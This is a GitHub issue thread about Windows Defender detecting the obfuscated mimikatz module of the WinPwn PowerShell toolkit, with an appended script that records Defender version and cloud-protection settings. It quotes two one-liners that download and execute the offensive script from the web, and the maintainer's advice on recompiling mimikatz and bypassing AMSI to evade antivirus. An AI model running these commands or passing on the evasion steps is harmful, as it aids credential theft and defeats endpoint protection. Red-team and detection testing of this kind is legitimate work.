Closed sp00ks-git closed 4 years ago
Expected behaviour, but I did not think that its signature would be caught that fast. Is cloud detection on or off?
Cloud Protection is "on", so as to simulate a real-life scenario.
I won't re-obfuscate the loaded scripts each time they are flagged by a vendor; that would be too much overhead. I will update the mimikatz version from time to time with other string replacements, but it will most likely get flagged again after some days.
If you need an unflagged version, I recommend compiling your own mimikatz version and embedding it in Invoke-ReflectivePEInjection.ps1, which also needs some modification for an AMSI bypass afterwards. I have a gist for the mimikatz string replacement.
When running WinPwn in AMSI with
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/ObfusWinPwn.ps1')
or
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/Obfus_SecurePS_WinPwn.ps1')
both ways, after selecting option 16, Windows Defender picks up the obfuscated mimikatz version as malicious :-(
Tested on testbed: Windows Server 2016 Standard Edition x64
Windows Defender details:
Antimalware Client Version: 4.18.2004.6
Engine Version: 1.1.17100.2
Antivirus definition: 1.317.173.0
Antispyware definition: 1.317.173.0
Network Inspection System Engine Version: 1.1.17100.2
Network Inspection System Definition Version: 1.317.173.0
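The report above pairs a detection with the exact Defender client, engine, signature and cloud-protection state it was observed under, which is what makes such a report reproducible. The following PowerShell, added here as an example and not part of the WinPwn project or this thread, collects the same fields with the built-in Defender module (Get-MpComputerStatus, Get-MpPreference, Get-MpThreatDetection), refuses to record results when cloud-delivered protection is not actually on, and writes the record to a log; the log path is an assumption.

```powershell
# Added example (not from the WinPwn project): capture the Defender state a
# detection report should carry, in the same fields as the issue above.
# Requires the Defender PowerShell module (Windows Server 2016 / Windows 10+)
# in an elevated session.

function Get-DefenderTestbedState {
    $status = Get-MpComputerStatus
    $pref   = Get-MpPreference

    # MAPSReporting: 0 = Disabled, 1 = Basic, 2 = Advanced membership.
    $mapsNames = @{ 0 = 'Disabled'; 1 = 'Basic'; 2 = 'Advanced' }

    [pscustomobject]@{
        ComputerName              = $env:COMPUTERNAME
        OSVersion                 = [System.Environment]::OSVersion.VersionString
        AntimalwareClientVersion  = $status.AMProductVersion
        EngineVersion             = $status.AMEngineVersion
        AntivirusDefinition       = $status.AntivirusSignatureVersion
        AntispywareDefinition     = $status.AntispywareSignatureVersion
        NISEngineVersion          = $status.NISEngineVersion
        NISDefinitionVersion      = $status.NISSignatureVersion
        RealTimeProtectionEnabled = $status.RealTimeProtectionEnabled
        CloudProtection           = $mapsNames[[int]$pref.MAPSReporting]
        SubmitSamplesConsent      = $pref.SubmitSamplesConsent
        CollectedAt               = (Get-Date).ToString('o')
    }
}

# Most recent detections, so the report can name what Defender flagged and when.
function Get-RecentDefenderDetections {
    param([int]$Count = 5)
    Get-MpThreatDetection |
        Sort-Object InitialDetectionTime -Descending |
        Select-Object -First $Count ThreatID, ProcessName, InitialDetectionTime, ActionSuccess, Resources
}

$state = Get-DefenderTestbedState
$state | Format-List

# Refuse to record a result from a host that is not in the "cloud protection on"
# configuration the issue describes.
if ($state.CloudProtection -eq 'Disabled') {
    throw "Cloud-delivered protection is disabled on $($state.ComputerName); enable MAPS before testing."
}

Get-RecentDefenderDetections | Format-Table -AutoSize

# Append the state record as one JSON line (log path is an assumption).
$LogPath = Join-Path $env:TEMP 'defender-state.jsonl'
$state | ConvertTo-Json -Compress | Add-Content -Path $LogPath
```

Run it once before and once after the test; a changed AntivirusDefinition between the two records explains a result that differs from an earlier run, which is the situation the maintainer describes when a re-released build is flagged again after a few days.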